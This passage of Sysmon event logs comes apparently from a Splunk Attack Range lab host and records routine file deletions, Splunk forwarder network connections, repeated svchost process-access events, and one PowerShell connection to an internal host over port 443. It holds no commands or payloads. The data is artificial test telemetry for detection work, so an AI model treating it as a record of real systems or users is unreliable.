Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56584-false10.0.1.12-8000- 23542300x800000000000000035084259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:50.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67250D1365C8692AE07D9D7136C2C396,SHA256=0A8778362C28CEFBFB792BB8D771341F49840E62B8E769C97DCDB37FE82E2603,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:51.472{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717ED9EC263A3142C569E840F9FF709F,SHA256=6C4309ECBA12D4A7F35BF070EC0B39B7D3157D6DA25349EEBE5524FBA830F1C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:52.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F616D8A873449A52A9A74E543A1F7E1,SHA256=F0E837E9BD66BBBA537069BFAB01C2A835E42C66FEDD4AEAF159656D8904150E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:53.501{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07AF66446B719A078A02BFEB900D9146,SHA256=067A1237957F4894FAA84F6CE8417357962743A8B425D1A98668F0EC66E51413,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D815192E55D3557EA96015D9A99B0009,SHA256=8D72D09BF03755558B45806EC960491699F45EC460A7488425CD41947D996957,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.820{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:54.519{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCDCCE07F09D063A341A28D547A750B5,SHA256=50AC02CAAFF310BAA1580C8033EEDEB2BCEDE6DED3E7010A6C4D0937F54953ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:55.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=090FA383A04AEF81E416C7570B1F4C47,SHA256=7644726A5255F38E2C69CB095DE3DAD86D97470454FC4CBE7ADF83CAF97D9024,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:56.652{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D48E9C8FAEA2E90FC145A7590782F1,SHA256=3BD9DB15BC3F14ECA4E09F36E6DA9C6E769AF2B84322838A25085F1160B2D0C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:19.818{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56585-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:57.682{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83118257B211CC73885ADAAE08CAA9A0,SHA256=0A8A1DC6843AF673033D1F82E5B815ECBBDC33B666F0C66B0E211F954107B6F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:21.086{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56587-false10.0.1.12-8000- 354300x800000000000000035084270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:20.816{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56586-false10.0.1.12-8089- 23542300x800000000000000035084273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:58.697{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBF1411694E9034D06A2C6AAA5C50B34,SHA256=F151096CCD217E63C89981ED1590270F186223CA80B57C1282AEB8292770F001,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:59.034{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 